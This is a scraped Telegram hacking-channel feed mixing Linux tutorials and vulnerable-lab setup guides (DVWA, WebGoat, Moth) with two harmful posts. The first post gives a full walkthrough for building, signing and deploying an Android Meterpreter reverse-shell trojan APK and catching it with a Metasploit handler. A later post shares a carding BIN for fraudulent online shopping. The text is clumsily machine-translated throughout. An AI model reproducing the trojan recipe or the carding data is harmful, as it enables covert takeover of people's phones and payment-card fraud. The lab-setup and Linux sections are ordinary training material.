UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.2K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Android Hacking Steps by undercode :
1. Create Payload

To create a trojan for hacking Android, we need to create a payload using the msfvenom utility in Kali Linux.

root @ destroyer: ~ # msfvenom -p android / meterpreter / reverse_tcp LHOST = 192.168.0.50 LPORT = 4444 R> /root/MyPath/my0704.apk
No platform was selected, choosing Msf :: Module :: Platform :: Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9485 bytes


In the LHOST command above, IP is set, used in the ifconfig command from Kali Linux.

The above command creates a Trojan apk file that will be installed on the target phone for use, however before that we must sign this apk for proper installation. Follow the steps below the list for this.

and. Creating a keystore:

root @ destroyer: ~ # keytool -genkey -v -keystore my-release-key.Keystore -alias app -keyalg RSA -keysize 2048 -validity 10000


The above team asks questions and password.

b. Sign the created file using jarsigner apk.

root @ destroyer: ~ # jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore /root/MyPath/my0704.apk app
Enter Passphrase for keystore:
adding: META-INF / APP.SF
adding: META-INF / APP.RSA
signing: classes.dex
signing: AndroidManifest.xml
signing: resources.arsc
jar signed.

Warning:
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-08-21) or after any future revocation date.


with. Check apk created with jarsigner.

root @ destroyer: ~ # jarsigner -verify -verbose -certs /root/MyPath/my0704.apk


e. File optimization with zipalign apk.

Before you begin, install zipalign using the command below:

apt-get install zipalign


Now let me optimize apk.

root @ destroyer: ~ # zipalign -v 4 /root/MyPath/my0704.apk /root/MyPath/my0704_sign.apk
Verifying alignment of /root/MyPath/my0704_sign.apk (4) ...
50 META-INF / MANIFEST.MF (OK - compressed)
281 META-INF / APP.SF (OK - compressed)
623 META-INF / APP.RSA (OK - compressed)
1752 META-INF / (OK)
1802 META-INF / SIGNFILE.SF (OK - compressed)
2087 META-INF / SIGNFILE.RSA (OK - compressed)
2750 classes.dex (OK - compressed)
8726 AndroidManifest.xml (OK - compressed)
10443 resources.arsc (OK - compressed)
Verification successful


Thus, our final apk, which we use to crack the android, is named as β€œmy0704_sign.apk”.

2. Run msfconsole on Kali Linux to operate the Android phone.

root @ destroyer: ~ # msfconsole

Call trans opt: received. 01-01-17 20:00:10 REC: Loc

Trace program: running

wake up, Neo ...
the matrix has you
follow the white rabbit.

knock, knock, Neo.

(`., -,
``. ,; ' /
`. , '/.'
`. X /. '
.-; --'' - .._ `` (
. ' / `
, `` Q '
,, `._ \
,. | '' -.; _ '
:. `; `` -, .._;
'',). '
`._, '/ _
; , '' - ,; ' `` -
`` -..__ `` --`

http://metasploit.com


Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro - learn more on http://rapid7.com/metasploit

= [metasploit v4.12.22-dev]
+ - - = [1577 exploits - 906 auxiliary - 272 post]
+ - - = [455 payloads - 39 encoders - 8 nops]
+ - - = [Free Metasploit Pro trial: http://r-7.co/trymsp]

msf>


In the msf line above, launch the payload on android and exploit command multiboot using below:

msf> use exploit / multi / handler
msf exploit (handler)> set payload android / meterpreter / reverse_tcp
payload => android / meterpreter / reverse_tcp
msf exploit (handler)>


In the command below we use Kali Linux IP, can be taken using the ifconfig command on Kali Linux. In addition, we use port number 4444 for operation.
msf exploit (handler)> set LHOST 192.168.0.50
LHOST => 192.168.0.50
msf exploit (handler)> set LPORT 4444
LPORT => 4444
msf exploit (handler)>


And then finally use a command that will wait for apk to execute on the Android phone.

msf exploit (handler)> exploit

[*] Started reverse TCP handler on 192.168.0.50-00-00444
[*] Starting the payload handler ...


Running apk on android.
Here we use the Android emulator provided by Google. Therefore, you need to download the ISO image from the site Google.

After booting, you can create a normal VMware virtual machine and mount this ISO on the virtual machine to start the virtual machine. Configure Android VM using id gmail.


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Android Hacking via kali linux Steps full by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Damn Vulnerable Web App :


1) Usually, web application creators in every possible way boast of the high reliability of their product, boast of built-in WAF (firewall for web applications) and bashfully laugh it off if they find another bug in their scripts. The developers of Damn Vulnerable Web App, on the contrary, categorically declare that the installation on a
live web server is unacceptable, because the application ... is "damn vulnerable" :).

2) All the most common mistakes of unfortunate programmers are collected in one place, so that you can train to conduct a variety of attacks.

3) The most popular PHP / MySQL bundle was chosen as a platform, for the same reason we start our review with DVWA. If you want to save time on setting up a web server, everything will work fine on ready-made assemblies:

πŸ¦‘HOW TO DO ?

> Denwer 'e or
Download : http://www.denwer.ru/

>XAMPP ' e.
http://www.apachefriends.org/xampp-en.html


2) Actually, you just need to unzip the files into the public html directory and access the browser in http://127.0.0.1/dvwa/index.php. You don’t even have to tinker with manual database creation: the menu has a Create / Reset Database button.

3) But if you still want to tighten something up, then this can be done in the /config/config.inc.php config.

4) Another point is about setting up PHP: you need to make sure that
all changes are made to PHP.ini .

magic_quotes_gpc = Off
allow_url_fopen on
allow_url_include on


WRITTEN BY uNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Webgoat
(Damn Vulnerable Web App)

1) When the author of Mutillidae said that many of the hacking quests are not suitable for beginners, he meant, including the development of WebGoat.

2) The project is notable for the fact that it is developing as part of the already familiar OWASP (Open Web Application Security Project) project, under the auspices of which a large number of security utilities are being released. But if the two previous projects offer to play with
PHP-applications, then here you will come across code written in Java. A
standard TomCat server is used for hosting J2EE applications
/ fortunately, it is

3) already included in the WebGoat assembly and configured so that it can be started
as simply as possible:

πŸ¦‘HOW TO DO ?

1) First, unpack WebGoat-OWASP_Standard-xxzip into the working
directory.

2) We start the TomCat daemon by running webgoat.bat. For this,
a fresh J2EE must be installed in the system .

3) We go in the browser at the link http: // localhost / WebGoat / attack.
Log in as guest / guest.

4) We try our strength.

> Assignments are usually tied to a real problem. For example, in one of the quests, an SQL injection is proposed to steal a list of fake
credit numbers. Some tasks are accompanied by a training component,
showing the user useful hints and vulnerable code.

WRITTEN BY undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘WHAT IS Moth AND WHY IS SO USEFULL ?


1) Moth is configured to receive all network settings from a DHCP server,
so you need to make sure that the network settings in the virtual machine settings are set accordingly (for example, I get an IP router, so I just chose Bridged mode, which releases the virtual machine into the physical network )

2) Next, just start the virtual machine, log in to the system (moth / moth), go to bed

> ifconfig'om received by the IP system and access the Moth admin panel via the browser:

> http: // <moth-ip_address>. You will be taken to the main page, where you can go

3) to the scripts of famous products pre-installed on the server: the
Wordpress 2.6.5 blogging engine , the Vanilla 1.1.4 forum and other PHP / MySQL-based developments, and
also one Java + Tomcat6 + MySQL project.

4) To enhance the reality of what is happening, three methods have been implemented for accessing
scripts: directly, through mod_security, and through PHP-IDS:

> http: //moth/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>

> http: //moth/mod_security/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>

> http: //moth/php-ids/w3af/audit/xss/simple_xss.php? text = <script> alert ('xss'); </script>
Mod_security and PHP-IDS are WAF (Web Application Firewall) and
offer additional protection for web applications (more in our article " Firewall

5) for web applications " in the October issue of "Hacker"). Each of them keeps a detailed log of suspicious requests, so this is also a great way to figure out how these

6) WAFs work and how to trick them. The project itself is being updated, and the authors promise in the near future to add vulnerable applications written in Python and Ruby.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from Backup Legal Mega
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to copy a file from one directory to another using Linux
-BEGINER TIPS :

How to copy a file from one directory to another using Linux

1) cp / source / path / name / target / path / name


2) For example, imagine that you have the following folder structure:

home
andreyex
documents
folder_one
file_one
file_two
file_three
folder_two
file4

3) If you want to copy file_one from the current location to / home / andreyex / documents / folder_one to / home / andreyex / documents / folder_two, then you must enter the following command at the command line:

4) cp / home / andreyex / documents / folder_one / file_one / home / andreyex / documents / folder_two / file_one


πŸ¦‘ You can make shortcuts here :

1) The main part can be replaced with a tilde (~), which is explained in this article. This changes the command to:

2) cp ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one

3) You can simply omit the file name for the purpose if you intend to use the same file name

cp ~ / documents / folder_one / file_one ~ / documents / folder_two


4) If you are already in the target folder, you can simply replace the path to the target with a full stop.

cp ~ / documents / folder_one / file_one


5) lternatively, if you are already in the source folder, you can simply specify the file name as the source as follows:

cp file_one ~ / documents / folder_two

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to backup before copying files on Linux ?

1) In the previous section, folder_one contains a file named file_one and folder_two does not. Imagine that folder_two has a file called file_one and you run the following command:

2) cp file_one ~ / documents / folder_two


πŸ¦‘The above command will overwrite file_one, which is currently located in folder_two. There are no hints, no warnings and error messages, because, you specified a valid command.

1) You can take precautions when copying files on Linux to back up a file before it overwrites it. Just use the following command:

2) cp -b / source / file / target / file


πŸ¦‘For instance:

1) cp -b ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


2) The destination folder now contains the file that was copied and there will also be a file with a tilde (~) at the end, which is a backup of the original file.

3) You can change the backup command to work in a slightly different way, so that it creates numbered backups. You can do this if you have already backed up files and backups already exist. This is a form of version control.

4) cp --backup = numbered ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


5) The file name for the backups will change: file_one. ~ 1 ~, file_one. ~ 2 ~, etc.

written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ How to request before overwriting files when copying to Linux
If you do not want to make backup copies of the files lying on your file system, but you also want to make sure that the copy command does not overwrite the file indiscriminately, you may receive a prompt to indicate if you want to overwrite. - Kali -parrot-debian-..

πŸ¦‘ To do this, use the following syntax:

1) cp -i / source / file / target / file


For instance:

2) cp -i ~ / documents / folder_one / file_one ~ / documents / folder_two / file_one


3) The message will look like this: cp: overwrite './file1'?

To overwrite the file, press Y on the keyboard or to cancel, press N or CTRL and C at the same time.



πŸ¦‘ What happens when copying symbolic links on Linux
A symlink is a bit like a desktop shortcut. The contents of the symbolic link is the address of the physical file.

Imagine you have the following folder structure:

home
andreyex
documents
folder_one
file_one
folder_two
file_one (symbolic links points to folder_one / file_one)
folder3
Look at the following command:

cp ~ / documents / folder_one / file_one ~ / documents / folder3 / file_one


4) This should not be anything new, since it copies a physical file from one folder to another.

πŸ¦‘What happens, however, if you copy a symbolic link from folder_two to folder3?

1) cp ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


2) A file that is copied to folder3 will not be a symbolic link. This is actually a file pointed to by a symbolic link, so in fact you will get the same result as if by copying file_one from folder_one.

By the way, you can get the same result with the following command:

3) cp -H ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


4) Just to be sure, although there is one more switch that absolutely makes the file copy, not a symbolic link:

cp -L ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


5) If you want to copy a symbolic link, you must specify the following command:

cp -d ~ / documents / folder_two / file_one ~ / documents / folder3 / file_one


6) To copy a symbolic link, not a physical file, using the following command:

cp -P ~ / documents / folder_two / file_one ~ documents / folder3 / file_one


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to create hard links using the cp command-kali-parrot-debian :
&
What is the difference between a symbolic link and a hard link?

1) A symbolic link is a shortcut to a physical file. It does not contain more than the address of a physical file.

2) A hard link to the main link to the same physical file, but with a different name. It is almost like a nickname. This is a great way to organize files without taking up further disk space.

3) This guide will tell you everything you need to know about hard links.

4) You can create a hard link using the cp command.

cp -l ~ / source / file ~ / target / file


5) As an example of why you could use a hard link, consider that you have a folder called video and in this video folder you have a really large video file called undercodeTestingvideo.mp4. Now imagine that you also want the video to be known as barbadosvideo.mp4, because it also has frames of Barbados.

6) You can simply copy the file and give it a new name, but that means that you increase twice as much disk space for what is essentially the same video.

> You could, instead of creating a symbolic link named barbadosvideo.mp4, which points to the honeymoonvideo.mp4 file. This will work well, but if someone deleted honeymoonvideo.mp4 you would be left with a link and nothing else and the connection still takes up disk space.

7) The only difference is that they contain a different number of inodes. (unique identifiers). Removing the honeymoon
video.mp4 file does not delete the file, but only reduces the number for this file by 1. The file will be deleted only if all links to this file are deleted.

8) To create a link, you could do something like this:

cp -l /videos/UndercodeTestingvideo.mp4 /videos/barbadosvideo.mp4


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Install Atom on Ubuntu :

Follow these steps to install Atom on your Ubuntu system by undercode :


1) Start by updating the list of packages and installing dependencies by typing:

2) sudo apt update

3) sudo apt install software-properties-common apt-transport-https wget

4) Then import the Atom editor's GPG key using the following wget command:

> wget -q https://packagecloud.io/AtomEditor/atom/gpgkey -O- | sudo apt-key add -

> Turn on the Atom repository by typing:

5) sudo add-apt-repository "deb arch = amd64 https://packagecloud.io/AtomEditor/atom/any/ any main"

6) After the repository is turned on, install the latest version of Atom using:

> sudo apt install atom

> Launch atom
7) Now that Atom is installed on your Ubuntu system, you can start it either from the command line by typing code.

8) Now you can start installing themes and extensions and customizing Atom to your preference.

> Atom update

9) To upgrade your Atom installation when publishing new releases, you can use the normal apt package upgrade procedure:

> sudo apt update
> sudo apt upgrade


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ BIN Wish Shoppingβœ…

4895040448xxxxxx

CVV / Date: RND (Random)

IP: Spain
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Quick interpretation of network configuration files


In the Linux system of iamafan , the TCP/IP network is configured through several text files, which need to be edited to complete the networking work. The important network configuration files in the system are:

β—† /etc/sysconfig/network
β—† /etc/HOSTNAME
β—† /etc/hosts
β—† /etc/services
β—† /etc/host.conf
β—† /etc/nsswitch.conf
β—† /etc/ resolv.conf
β—† /etc/rc.d/init.d/network

Next we will talk about these files one by one, these files can be modified while the system is running, without starting or stopping any daemons, the changes will take effect immediately ( Except /etc/sysconfig/network). In addition, these files all support comments starting with ""#"". Each file has an entry in Part 5 of the UNIX man page. You can use the man command to get them.

β—† /etc/sysconfig/network network settings
This file is used to specify network configuration information on the server, and contains parameters that control the behavior of network-related files and daemons. The following is an example file:

NETWORKING=yes
HOSTNAME=machine1
GATEWAY=210.34.6.2
FORWARD_IPV4=yes
GATEWAYDEV=

where NETWORK=yes/no indicates whether the network is configured;
HOSTNAME=hostname hostname represents the host name of the server;
GATEWAY=gw-ip gw-ip represents the IP address of the network gateway;
FORWARD_IPV4=yes/no whether to enable the IP forwarding function;
GAREWAYDEV=gw-dev gw-dw represents the device name of the gateway, Such as: eth0, etc.; in
order to be compatible with some old software, the ""/etc/HOSTNAME"" file should use the same host name as HOSTNAME=hostname.

β—† /etc/HOSTNAME host name

This file contains the host name of the system, including the complete domain name, such as:

192.168.0.1 machine1.domain machine1

This file is obtained from the HOSTNAME line in the file /etc/sysconfig/network at startup , Used to set the host name of the system at startup.

β—† /etc/hosts IP address and host name mapping

/etc/hosts contains the mapping between the IP address and the host name, including the alias of the host name, the design of the IP address makes the computer easy to identify, but it is very human It is difficult to remember them. In order to solve this problem, the file /etc/hosts was created. Here is an example file:

127.0.0.1 machine1 localhost.localdomain localhost
192.168.1.100 machine7
192.168.1.101 otherpc otheralias

In this example, the machine name is machine1, otherpc also has alias otheralias, which can point to otheralias. . Once the machine's network configuration file is configured, the network should be restarted for the changes to take effect. Use the following command to restart the network:

/etc/rc.d/init.d/network restart

/etc/hosts file usually contains the host name, localhost and the system alias frequently used by system administrators. Sometimes it takes a long time for telnet to reach the Linux machine. You can add the match between the IP address of the client's machine and the host name in "/etc/hosts". Reduce login wait time. In the absence of a domain name server, all network programs on the system resolve the IP address corresponding to a host name by querying the file, otherwise, other host names are usually resolved using DNS, and the configuration of the DNS client part is in the file / etc/resolv.conf.

β—† /etc/services

/etc/services contains the mapping between the service name and the port number. Many system programs use this file. The following are the first few lines in the default /etc/services when RedHat is installed:

tcpmux 1/tcp # TCP port service multiplexer
echo 7/tcp
echo 7/udp
discard 9/tcp sink null
discard 9/udp sink null
systat 11/tcp users

The leftmost column is the host service name, and the middle column is the port number. "/" is followed by the port type, which can be TCP or UDP. Any subsequent columns are aliases of the previous service. There are also aliases in this file. They appear after the port number. In the above example, sink and null are aliases for the discard service.
β—† /etc/host.conf Configure the name resolver

There are two files that declare where the system looks for name information to configure the library of UNIX name resolvers. The file /etc/host.conf is used by version 5 of the libc library, and /etc/nsswitch.conf is used by version 6 (glibc). The problem is that some programs use one and some use the other, so it is necessary to configure both files correctly.


written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

The /etc/host.conf file specifies how to resolve the host name. Linux uses the parser library to obtain the IP address corresponding to the host name. The following is the default content of ""/etc/host.conf" after RedHat installation:

order hosts, bind
multi on

β€»""order "" specifies the host name query order, and its parameters are search methods separated by commas, support The search methods are bind, hosts, and nis, which represent DNS, /etc/hosts, and NIS, respectively. Here, it is specified to query the ""/etc/hosts" file first and then use DNS to resolve the domain name.
β€»""Trim"" indicates that when the address to host name conversion is performed through DNS, the domain name will be clipped from the host name, and trim can be included multiple times by multiple domains, which is not good for /etc/hosts and NIS query methods Function, note that the host names in the /etc/hosts and NIS tables are listed appropriately (with or without the full domain name).
β€»""Multi"" specifies whether the host specified in the "/etc/hosts" file can have multiple addresses. A value of on indicates that it is allowed. Hosts with multiple IP addresses are generally said to have multiple network interfaces.
β€»""Nospoof "" means whether to allow IP address spoofing to the server. The value is on means not allowed. IP spoofing is a means to attack the security of the system. By disguising the IP address as another computer, you can obtain the other computer’s trust.
β€»""Alert"" When the nospoof command is on, the alert controls whether the attempt to deceive is recorded by the syslog tool. The value of on indicates use, and the default value is off.
β€»""Rccorder"" If set to on, all queries will be reordered, so hosts in the same subnet will be returned first, the default value is off.

β—† /etc/nsswitch.conf configuration name resolver

/etc/nsswitch.conf file is developed by Sun and used to manage the order of multiple configuration files in the system, it provides more than the /etc/host.conf file Function. Each line in /etc/nsswitch.conf is either a comment (beginning with a # sign) or a keyword followed by a colon and a series of sequential methods to be tried. Each keyword is in /etc/ directory which can be /etc/nsswitch. The name of the /etc file controlled by conf.

The following keywords can be included: β€»aliases mail aliases;
β€»passwd system users;
β€»group user groups;
β€»shadow hidden passwords;
β€»hosts hostnames and IP addresses;
β€»networks network names and numbers;
β€»protocols network protocol;
β€»Services port number and service name;
β€»ethers Ethernet number;
β€»rpc remote process call name and number
β€»netgroup intranet group

The following keywords can also be included: